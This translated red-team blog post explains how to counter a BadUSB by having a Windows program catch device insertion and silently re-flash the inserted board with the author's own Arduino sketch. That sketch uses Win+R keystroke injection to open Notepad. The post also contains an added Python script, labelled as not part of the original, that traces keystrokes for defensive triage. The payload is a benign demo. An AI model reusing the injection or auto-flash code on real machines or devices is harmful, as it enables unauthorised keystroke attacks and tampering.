Preface

As red-blue confrontation grows fiercer, the red team's attack vectors have expanded from the original web-based methods into many other directions, such as hardware attacks.

The most obvious hardware attack is BadUSB. I think everyone knows it already; there are plenty of articles about it online.


Another way of burning BadUSB

Most BadUSB burning methods on the Internet flash the device through the Arduino IDE, but after my own research I found that Arduino sketches can also be burned through command line parameters, as follows:

```
C:\Users\Administrator\Desktop\Arduino\arduino_debug.exe --port <COM port> --upload <sketch .ino file>
```

For the file path, see the following figure. When the sketch is saved, the IDE writes it with the .ino suffix. After my own command line compilation test, the path should be:

```
C:\xxx\sketch_apr01a\sketch_apr01a.ino
```

sketch_apr01a.ino is the project file, and it sits inside a directory of the same name, sketch_apr01a.

Code analysis process

In Windows SDK development, any window can receive messages and respond to them. In the same way, when a BadUSB or USB flash drive is inserted or removed, a corresponding message is delivered and can be handled.

The message used is WM_DEVICECHANGE.

(It notifies an application of a change to the hardware configuration of a device or of the computer; the message is received in the window procedure, WindowProc.)

The function prototype is as follows:

```c
LRESULT CALLBACK WindowProc(HWND   hWnd,
                            UINT   message,
                            WPARAM wParam,
                            LPARAM lParam);
```

The third argument of WindowProc, wParam, identifies the event that occurred; its possible values are defined in the dbt.h header. The macros we will use from dbt.h are:

```c
DBT_DEVICEARRIVAL         // sent when a device is inserted
DBT_DEVICEREMOVECOMPLETE  // sent when a device is pulled out
```

Code implements the message response

Let's start with the WndProc function. Message handling is implemented as one case per message.

Add your own message handler; with the following code, a message box pops up when the BadUSB is inserted, showing that a device was inserted.

```c
case WM_DEVICECHANGE:                 // capture the device change message
    switch (wParam)
    {
    case DBT_DEVICEARRIVAL:           // capture device insertion
        MessageBoxA(NULL, "device insert", "test", MB_OK);
        break;
    case DBT_DEVICEREMOVECOMPLETE:    // capture device removal
        MessageBoxA(NULL, "Device unplugged", "test", MB_OK);
        break;
    }
    break;
```

Here, when I insert the BadUSB, the message is captured successfully and the pop-up appears.

Core code implementation

Since the message handler runs when the BadUSB is inserted, let it execute the Arduino command line and burn the device automatically. When the red team later plugs that BadUSB in again, it executes the code we burned.

The sketch burned to the BadUSB is shown below; setup() is the initialization function. When the BadUSB is inserted, it opens Notepad and types "By: Met32". You can change this yourself; I write it this way only for the sake of demonstration.

```c
void setup() {
  // put your setup code here, to run once:
  Keyboard.begin();                // start keyboard communication
  delay(1000);
  Keyboard.press(KEY_CAPS_LOCK);   // toggle Caps Lock first; otherwise most machines have trouble with the input
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.press(KEY_LEFT_GUI);    // press the Win key
  delay(500);
  Keyboard.press('r');             // press r
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);  // release the Win key
  Keyboard.release('r');
  delay(500);
  Keyboard.println("notepad");     // type notepad to open Notepad
  delay(500);
  Keyboard.press(KEY_RETURN);      // press the Enter key
  Keyboard.release(KEY_RETURN);    // release the Enter key
  delay(500);
  Keyboard.println(" By: Met32 "); // type the information we want to display
  Keyboard.press(KEY_RETURN);      // press the Enter key
  Keyboard.release(KEY_RETURN);    // release the Enter key
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK);   // toggle Caps Lock back
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.end();
}

void loop() {
  // put your main code here, to run repeatedly:
}
```
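As an added example (not code from the original post), here is a small Python triage script that reconstructs the keystroke sequence a Keyboard.* sketch like the one above would inject, so a defender can see what a captured sketch does before touching it. It assumes only the Arduino Keyboard library call names used above; the sample sketch is constructed here.

```python
import re

# Constructed sample in the style of the sketch burned in this post (not the post's exact code).
SAMPLE_SKETCH = r'''
void setup() {
  Keyboard.begin();
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');          // Win+R
  Keyboard.releaseAll();
  Keyboard.println("notepad");  // println also sends Enter
  Keyboard.print("By: Met32");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  Keyboard.end();
}
'''

MODIFIERS = {"KEY_LEFT_GUI", "KEY_RIGHT_GUI", "KEY_LEFT_CTRL", "KEY_RIGHT_CTRL",
             "KEY_LEFT_ALT", "KEY_RIGHT_ALT", "KEY_LEFT_SHIFT", "KEY_RIGHT_SHIFT"}
COMMENT_RE = re.compile(r'//[^\n]*|/\*.*?\*/', re.DOTALL)   # naive: also eats // inside strings
# One Keyboard.<method>(<arg>) call; arg is a "string", a 'c' char, a KEY_* name, or empty.
CALL_RE = re.compile(r'''Keyboard\s*\.\s*(begin|end|press|release|releaseAll|print|println|write)'''
                     r'''\s*\(\s*("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)'|[A-Za-z_]\w*)?\s*\)''')

def trace_keystrokes(sketch):
    """Walk the Keyboard.* calls in order and return the HID actions they would perform."""
    events, held = [], []                      # held: keys currently pressed, in press order
    for method, arg in CALL_RE.findall(COMMENT_RE.sub("", sketch)):
        key = arg.strip("'")
        if method == "press":
            held.append(key)
            mods = [k for k in held[:-1] if k in MODIFIERS]   # modifiers already held -> chord
            events.append(("chord " + "+".join(mods + [key])) if mods else ("press " + key))
        elif method == "release" and key in held:
            held.remove(key)
        elif method == "releaseAll":
            held.clear()
        elif method in ("print", "println", "write"):
            events.append("type " + (arg[1:-1] if arg[:1] in ('"', "'") else arg))
            if method == "println":                            # println appends a newline
                events.append("press KEY_RETURN")
    return events

def summarize(sketch):
    """Triage view: HID keyboard used?, which key chords, what text gets typed."""
    events = trace_keystrokes(sketch)
    return {"hid_keyboard": bool(re.search(r'Keyboard\s*\.\s*begin', COMMENT_RE.sub("", sketch))),
            "chords": [e[6:] for e in events if e.startswith("chord ")],
            "typed": [e[5:] for e in events if e.startswith("type ")]}
```

Run trace_keystrokes() on a captured .ino to get the ordered key events, or summarize() for a one-line verdict on what the device would type.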

The WndProc code is as follows.

```c
#include <windows.h>
#include <dbt.h>     // DBT_DEVICEARRIVAL, DBT_DEVICEREMOVECOMPLETE
#include <stdlib.h>  // system()

// hInst, IDM_ABOUT, IDM_EXIT, IDD_ABOUTBOX and About() come from the Visual Studio Win32 project template.
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    int wmId, wmEvent;
    PAINTSTRUCT ps;
    HDC hdc;

    switch (message)
    {
    case WM_COMMAND:
        wmId = LOWORD(wParam);
        wmEvent = HIWORD(wParam);
        switch (wmId)
        {
        case IDM_ABOUT:
            DialogBox(hInst, MAKEINTRESOURCE(IDD_ABOUTBOX), hWnd, About);
            break;
        case IDM_EXIT:
            DestroyWindow(hWnd);
            break;
        default:
            return DefWindowProc(hWnd, message, wParam, lParam);
        }
        break;
    case WM_PAINT:
        hdc = BeginPaint(hWnd, &ps);
        // TODO: Add any drawing code here...
        EndPaint(hWnd, &ps);
        break;
    case WM_DESTROY:
        PostQuitMessage(0);
        break;
    case WM_DEVICECHANGE:
        switch (wParam)
        {
        case DBT_DEVICEARRIVAL:   // device inserted: burn our sketch over the command line
            // Backslashes must be doubled in a C string literal; system() blocks the message loop until the upload finishes.
            system("C:\\Users\\Arduino\\arduino_debug.exe --port COM5 --upload C:\\Users\\Administrator\\Desktop\\sketch_apr01a\\sketch_apr02a\\sketch_apr02a.ino");
            break;
        case DBT_DEVICEREMOVECOMPLETE:
            MessageBoxA(NULL, "Device unplugged", "test", MB_OK);
            break;
        }
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}
```

Use process

Now let's see the effect: when the BadUSB is inserted, the burned content is copied onto the other side's BadUSB.

After the program exits, insert the BadUSB again: the message is displayed successfully, proving that we burned our sketch onto the other side's BadUSB.

End note

There is no need to worry about the Arduino path, because it lives on our own machine. The problem is the COM port: after the BadUSB is inserted, we do not know which port it uses, so you can loop over all the common COM port numbers and run the upload for each one.

If you want to be more thorough, you can disable the keyboard as soon as the BadUSB is inserted and only then execute our system command.
